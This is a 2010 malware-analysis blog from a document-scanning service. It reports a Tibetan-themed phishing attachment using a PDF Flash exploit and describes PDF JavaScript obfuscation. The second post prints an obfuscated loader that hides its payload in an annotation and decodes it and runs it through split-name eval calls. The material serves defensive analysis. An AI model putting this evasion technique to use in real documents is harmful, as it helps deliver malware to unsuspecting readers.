Monday, July 19, 2010

Worst Social Engineering Ever

From a recent submission via the email intake - hereyougo at vicheck.ca:

With a subject line of an invitation to a Tibetan event, invitation.rar (3026984137716828cf8f55b10bb0069) contained the aptly named "exploit.pdf", which certainly inspires confidence to open the attachment:

exploit.pdf:
EXECUTABLE SCAN: PDF Exploit Embedded Flash may be CVE-2010-1297 (genexploit/full)
REPORT: https://www.vicheck.ca/md5query.php?hash=ee81327f15db183f83815754fbfad5dd
Exploit method detected as genexploit - PDF Exploit Embedded Flash may be CVE-2010-1297.
Confidence ranking: 100 (11 hits).

Embedded EXE is encrypted with a 256 byte key as well as a simple replacement cipher.

Drops:

Thursday, February 11, 2010

PDF JavaScript Obfuscation

Here's a quick note on an emerging JavaScript obfuscation technique. It uses getAnnots and syncAnnotScan to iterate through FlateDecode blocks which contain raw encoded data. Inside the encoded data is usually packed obfuscated JavaScript carrying some recent exploit.

// Obfuscated loader as found in the PDF's JavaScript; comments added for analysis.
var z; var y; z = y = app.doc;          // handle to the current document
y = 0; z.syncAnnotScan ( ); y = z;      // force an annotation scan so getAnnots() sees them
var p = y.getAnnots( { nPage: 0 }) ;    // all annotations on the first page
var s = p[0].subject;                   // payload hidden in the first annotation's /Subject
var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));   // 'a%b' -> '%': restore every 'z' to '%'
s = this['unes' + 'cape'] (l) ;         // unescape(l); name split to dodge string matching
var e = app['ev' + 'al']; e(s);         // app.eval(s): run the decoded script
s = ''; z = 1;

Wednesday, January 13, 2010

Our new blog

Welcome to the ViCheck blog; we're hoping to use this forum for updates on the malware analysis scene. Current trends are showing a rise in document format malware: viruses embedded in Adobe PDF or MS Office documents are difficult to detect. Our malware analysis engine at ViCheck.ca can detect current PDF exploits (media.newPlayer being the current favorite), as well as executables embedded in documents.

Yesterday's Google blog post has again highlighted the risks of PDF-based malware against private corporations, governments, and human rights groups. To reduce the risk from this type of malware, JavaScript can be disabled in Acrobat Reader.

Recent ViCheck analysis reports of malware, including PDF viruses, can be accessed from our website.